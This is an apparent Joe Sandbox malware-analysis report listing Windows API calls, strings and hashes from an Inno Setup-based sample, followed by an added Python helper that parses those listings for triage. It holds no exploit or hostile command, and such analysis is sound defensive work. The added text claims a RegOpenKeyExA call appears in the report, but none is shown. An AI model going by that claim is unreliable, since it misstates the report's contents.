• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
• Instruction ID: 8fc52e73ba06cc46e730b07d7f7f94568764801a7b8f51cd1014d1f63996c257
• Opcode Fuzzy Hash: 35b14883da97521222dd4ba63ab43259808bc2fdd283b26f07d3c05bbd11cdae
• Instruction Fuzzy Hash: EC4148B5A44104DFCB10CF99C6888AAB7F5FB49310B64C99AF848DB701D738EE45DB58

APIs
• ArcFourCrypt._ISCRYPT(?,?,?,0046DEA4,?,?,0046DEA4,00000000), ref: 0045D247
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
• Opcode ID: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
• Instruction ID: 5effe0378c810cd07e0217cdc1e7a72ed78fe315a0c34b067f2c35eeb24cdbba
• Opcode Fuzzy Hash: 60613f318f2e56de1b1058283c26d55875caf569050bffc963c4b4a7e30f6a75
• Instruction Fuzzy Hash: D0C09BF200420CBF650057D5ECC9C77B75CE6586547408126F7048210195726C104574

APIs
• ArcFourCrypt._ISCRYPT(?,00000000,00000000,000003E8,0046DB14,?,0046DCF5), ref: 0045D25A
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: CryptFour
• String ID:
• API String ID: 2153018856-0
• Opcode ID: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
• Instruction ID: 17600df93846144bfd8e61cd07b91608ca2a028cf3222f5d1774599e6ed580aa
• Opcode Fuzzy Hash: d774fb8793e7b9215c4f3788321c424c537fe54849dfeb2a35b58218e4d2cefe
• Instruction Fuzzy Hash: B7A002F0B80300BAFD2057F15E5EF26252C97D0F01F2084657306E90D085A56400853C

Memory Dump Source
• Source File: 00000001.00000002.2982243621.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.2982222276.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.2982266740.0000000010002000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_steel.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
• Instruction ID: 1c94840b05858ddf3503627acbaac9226f9c4a6e1659969bf0a936c2f155f8a0
• Opcode Fuzzy Hash: 550b9f88123d0c3b213a5d4b99e682963a3eaac5120c60ac7846f9a0f3bba5ba
• Instruction Fuzzy Hash: FF11303254D3D28FC305CF2894506D6FFE4AF6A640F194AAEE1D45B203C2659549C7A2

Memory Dump Source
• Source File: 00000001.00000002.2982243621.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000001.00000002.2982222276.0000000010000000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000001.00000002.2982266740.0000000010002000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_10000000_steel.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
• Instruction ID: 837d35c9df4effc004866add7a9100bdfed479f04b3922bb4bd4c5469ecd81ba
• Opcode Fuzzy Hash: aff350dcda9d135b5489d453054620cf61adfe11cc5af5bb48cdce25d513e1a9
• Instruction Fuzzy Hash:

APIs
  • Part of subcall function 0044B604: GetVersionExA.KERNEL32(00000094), ref: 0044B621
• LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
• GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
• GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
• GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
• GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
• GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
• GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
• GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
• GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
• GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
• GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
• GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
• GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
• GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
• GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
• GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
• GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B7C9
• GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B7DB
• GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B7ED
• GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B7FF
• GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B811
• GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B823
• GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B835
• GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B847
• GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B859
• GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B86B
• GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B87D
• GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B88F
• GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B8A1
• GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B8B3
• GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B8C5
• GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B8D7
• GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B8E9
• GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B8FB
• GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B90D
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B91F
• GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B931
• GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B943
• GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B955
• GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B967
• GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B979
• GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B98B
• GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B99D
• GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B9AF
• GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B9C1
• GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B9D3
Strings
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_steel.jbxd
Similarity
• API ID: AddressProc$LibraryLoadVersion
• String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
• API String ID: 1968650500-2910565190
• Opcode ID: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
• Instruction ID: e93aa9000a3b975727f71862fff1c9a8a52c50bca2d3d110ef64c9f3a3b13d35
• Opcode Fuzzy Hash: 4248c38413e99d9464b79edb7fe9b1fdc4fa56b35b8262d24df0eec612bb70b6
• Instruction Fuzzy Hash: D391A8F0A40B11ABEB00EFB5AD96A2A3BA8EB15714310067BB454DF295D778DC108FDD

APIs
• GetDC.USER32(00000000), ref: 0041CA40
• CreateCompatibleDC.GDI32(?), ref: 0041CA4C
• CreateBitmap.GDI32(0041A944,?,00000001,00000001,00000000), ref: 0041CA70
• CreateCompatibleBitmap.GDI32(?,0041A944,?), ref: 0041CA80
• SelectObject.GDI32(0041CE3C,00000000), ref: 0041CA9B
• FillRect.USER32(0041CE3C,?,?), ref: 0041CAD6
• SetTextColor.GDI32(0041CE3C,00000000), ref: 0041CAEB
• SetBkColor.GDI32(0041CE3C,00000000), ref: 0041CB02
• PatBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00FF0062), ref: 0041CB18
• CreateCompatibleDC.GDI32(?), ref: 0041CB2B
• SelectObject.GDI32(00000000,00000000), ref: 0041CB5C
• SelectPalette.GDI32(00000000,00000000,00000001), ref: 0041CB74
• RealizePalette.GDI32(00000000), ref: 0041CB7D
• SelectPalette.GDI32(0041CE3C,00000000,00000001), ref: 0041CB8C
• RealizePalette.GDI32(0041CE3C), ref: 0041CB95
• SetTextColor.GDI32(00000000,00000000), ref: 0041CBAE
• SetBkColor.GDI32(00000000,00000000), ref: 0041CBC5
• BitBlt.GDI32(0041CE3C,00000000,00000000,0041A944,?,00000000,00000000,00000000,00CC0020), ref: 0041CBE1
• SelectObject.GDI32(00000000,?), ref: 0041CBEE
• DeleteDC.GDI32(00000000), ref: 0041CC04
  • Part of subcall function 0041A058: GetSysColor.USER32(?), ref: 0041A062
Memory Dump Source
• Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ColorSelect$CreatePalette$CompatibleObject$BitmapRealizeText$DeleteFillRect
                                                                                            • String ID:
                                                                                            • API String ID: 269503290-0
                                                                                            • Opcode ID: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                            • Instruction ID: 91afdf38925dfcc0a19aef53af63d8b93a06df8cfedaf367688fa0d34ebdb442
                                                                                            • Opcode Fuzzy Hash: 8288b1a004c19d08e53adfd80f36b756ff19622159534b91a17c952f52f31838
                                                                                            • Instruction Fuzzy Hash: 01610071A44648AFDF10EBE9DC86FDFB7B8EB48704F10446AB504E7281D67CA940CB68
                                                                                            APIs
                                                                                            • CoCreateInstance.OLE32(00499A74,00000000,00000001,00499774,?,00000000,004569E3), ref: 0045667E
                                                                                            • CoCreateInstance.OLE32(00499764,00000000,00000001,00499774,?,00000000,004569E3), ref: 004566A4
                                                                                            • SysFreeString.OLEAUT32(00000000), ref: 0045685B
                                                                                            Strings
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning), xrefs: 004567F1
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption), xrefs: 004568CA
                                                                                            • %ProgramFiles(x86)%\, xrefs: 0045672E
                                                                                            • IShellLink::QueryInterface(IID_IPersistFile), xrefs: 00456904
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall), xrefs: 00456892
                                                                                            • IPersistFile::Save, xrefs: 00456962
                                                                                            • {pf32}\, xrefs: 0045671E
                                                                                            • CoCreateInstance, xrefs: 004566AF
                                                                                            • IPropertyStore::Commit, xrefs: 004568E3
                                                                                            • IShellLink::QueryInterface(IID_IPropertyStore), xrefs: 004567BD
                                                                                            • IPropertyStore::SetValue(PKEY_AppUserModel_ID), xrefs: 00456840
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateInstance$FreeString
                                                                                            • String ID: %ProgramFiles(x86)%\$CoCreateInstance$IPersistFile::Save$IPropertyStore::Commit$IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)$IPropertyStore::SetValue(PKEY_AppUserModel_ID)$IPropertyStore::SetValue(PKEY_AppUserModel_PreventPinning)$IPropertyStore::SetValue(PKEY_AppUserModel_StartPinOption)$IShellLink::QueryInterface(IID_IPersistFile)$IShellLink::QueryInterface(IID_IPropertyStore)${pf32}\
                                                                                            • API String ID: 308859552-2363233914
                                                                                            • Opcode ID: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                            • Instruction ID: 2d3acbfbfe5134b3b68b6dcde43dfe431d970b0eaffbfac770a5f5266a6492d0
                                                                                            • Opcode Fuzzy Hash: 26ac11ebc8d2bbba6934e2b7da4071208c956f88b3f37f3572524cf0602978ca
                                                                                            • Instruction Fuzzy Hash: 39B13170A00104AFDB50DFA9C845B9E7BF8AF09706F5540AAF804E7362DB78DD48CB69
                                                                                            APIs
                                                                                            • ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453
                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466
                                                                                            • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000), ref: 00498476
                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497
                                                                                            • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000), ref: 004984A7
                                                                                              • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                                                                            • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                                                                            • API String ID: 2000705611-3672972446
                                                                                            • Opcode ID: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                            • Instruction ID: 1a66146e65e487955493167600903b91e60bc3637ed1504a34615a6495e02ea1
                                                                                            • Opcode Fuzzy Hash: d895cb7c5264c7428a24ad32bd1f4b93e6c699b182eb53adebeee5f7002e5ba1
                                                                                            • Instruction Fuzzy Hash: 5191A434A042049FDF11EBA9DC52BAE7BE5EF4A304F5144BBF500AB692DE7C9C05CA19
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(00000000,0045A994,?,?,?,?,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 0045A846
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast
                                                                                            • String ID: .chm$.chw$.fts$.gid$.hlp$.lnk$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                                                                            • API String ID: 1452528299-3112430753
                                                                                            • Opcode ID: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                            • Instruction ID: 43962401d403c06de7b31dde6fd87328655f81364e16ca473e433d379c6e1912
                                                                                            • Opcode Fuzzy Hash: 41204ac3778d0b79d3de2409b6c45a5b2ad533d11cb42b90e75a22724f80c331
                                                                                            • Instruction Fuzzy Hash: EC719070B002545BCB00EB6998417AE77A49F4931AF91896BFC01AB383DB7C9E1DC75E
                                                                                            APIs
                                                                                            • GetVersion.KERNEL32 ref: 0045CBDA
                                                                                            • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA
                                                                                            • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
                                                                                            • GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14
                                                                                            • GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22
                                                                                              • Part of subcall function 0045CAC8: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0045CB67,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0045CB41
                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCDB
                                                                                            • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0045CE15,?,?,00000000), ref: 0045CCE4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$AllocateByteCharErrorHandleInitializeLastModuleMultiVersionWide
                                                                                            • String ID: GetNamedSecurityInfoW$SetEntriesInAclW$SetNamedSecurityInfoW$W$advapi32.dll
                                                                                            • API String ID: 59345061-4263478283
                                                                                            • Opcode ID: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                            • Instruction ID: 99773ef8a3d0261052733c4904a47669a242c0659fe16ead1f438c4abb71ff4e
                                                                                            • Opcode Fuzzy Hash: a232fc9af4861a9c5d561c4cdd8364b97c4fb44f2e207c549b4316288fabcd11
                                                                                            • Instruction Fuzzy Hash: BD518471900308EFDB10DF99C881BEEBBB8EB48711F14806AF904E7241C678A945CFA9
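The three function summaries above (the ShowWindow/CreateMutexA block, the advapi32 GetModuleHandleA/GetProcAddress block, and the RegOpenKeyExA subcall) are the kind of listing an analyst scans by hand for run-time-resolved imports, named mutexes and registry keys. The following is an added triage helper for exactly these per-function "APIs" bullets; it is neither Joe Sandbox code nor code from the analysed sample. The line format (`• Api.MODULE(args), ref: ADDR`, the argument-less `Api.MODULE ref: ADDR` form, and the `Part of subcall function ADDR:` prefix) is inferred from the bullets shown in this report, the hive names for the predefined HKEY handles (0x80000002 is HKEY_LOCAL_MACHINE) are standard Windows constants, and `SAMPLE_LINES` is constructed by copying bullets from the summaries above.

```python
"""Triage of Joe Sandbox per-function 'APIs' listings (added example, not part of the report)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One bullet of a function summary. Three shapes occur on the page:
#   • GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07
#   • GetVersion.KERNEL32 ref: 0045CBDA                         (no argument list)
#   • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(...), ref: 0042D481
# The pattern is inferred from these bullets; it is not a documented Joe Sandbox grammar.
API_LINE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")
# Predefined HKEY handles as they appear in the first RegOpenKeyEx argument.
HIVES = {"80000000": "HKCR", "80000001": "HKCU", "80000002": "HKLM", "80000003": "HKU"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                    # address of the call site inside the function
    subcall_of: Optional[str]   # set when the bullet was lifted from a called function

    def string_args(self) -> List[str]:
        """Arguments recovered as strings (export names, mutex names, key paths)
        rather than hex immediates or the '?' placeholder for unknown values."""
        return [a for a in self.args if a and a != "?" and not HEX8.match(a)]


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw is not None else []
    return ApiCall(m.group("api"), m.group("mod").upper(), args,
                   m.group("ref").upper(), m.group("sub"))


def triage(lines: List[str]) -> dict:
    """Collect what an analyst scans these blocks for: libraries and exports resolved
    at run time, named mutexes, and registry keys opened. Non-API lines are skipped."""
    calls = [c for c in map(parse_api_line, lines) if c is not None]
    out = {"calls": calls, "libraries": [], "dynamic_imports": [],
           "mutexes": [], "registry_keys": []}
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) >= 2 and c.args[1] != "?" \
                and not HEX8.match(c.args[1]):
            out["dynamic_imports"].append(c.args[1])       # lpProcName recovered as text
        elif c.api.startswith(("GetModuleHandle", "LoadLibrary")):
            out["libraries"].extend(c.string_args())
        elif c.api in ("CreateMutexA", "CreateMutexW") and len(c.args) >= 3 \
                and c.args[2] != "?" and not HEX8.match(c.args[2]):
            out["mutexes"].append(c.args[2])               # lpName is the third parameter
        elif c.api.startswith("RegOpenKeyEx") and len(c.args) >= 2 \
                and not HEX8.match(c.args[1]):
            out["registry_keys"].append(HIVES.get(c.args[0], c.args[0]) + "\\" + c.args[1])
    for key in ("libraries", "dynamic_imports", "mutexes", "registry_keys"):
        out[key] = list(dict.fromkeys(out[key]))           # keep order, drop duplicates
    return out


# Constructed input: bullets copied from the function summaries in this report.
SAMPLE_LINES = [
    r"• ShowWindow.USER32(?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000,00498B29,?,00000000), ref: 00498453",
    r"• CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,00498768,?,?,00000000,?,00000000,00000000,?,00498B1F,00000000), ref: 00498466",
    r"• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00498497",
    r"  • Part of subcall function 0042D44C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4DA,?,?,?,00000001,?,0045607E,00000000,004560E6), ref: 0042D481",
    r"• GetVersion.KERNEL32 ref: 0045CBDA",
    r"• GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0045CBFA",
    r"• GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoW), ref: 0045CC07",
    r"• GetProcAddress.KERNEL32(00000000,SetNamedSecurityInfoW), ref: 0045CC14",
    r"• GetProcAddress.KERNEL32(00000000,SetEntriesInAclW), ref: 0045CC22",
    r"  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38",
]

if __name__ == "__main__":
    result = triage(SAMPLE_LINES)
    for key in ("libraries", "dynamic_imports", "mutexes", "registry_keys"):
        print(f"{key}: {result[key]}")
```

Run over the whole "Code Analysis" section rather than these ten lines, the same function gives a per-report inventory of late-bound imports and host indicators without reading each block. Treat the mutex name with care as an indicator: the string on this page names an installer framework, so it will be shared by every installer built with it and does not by itself identify the payload.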
                                                                                            APIs
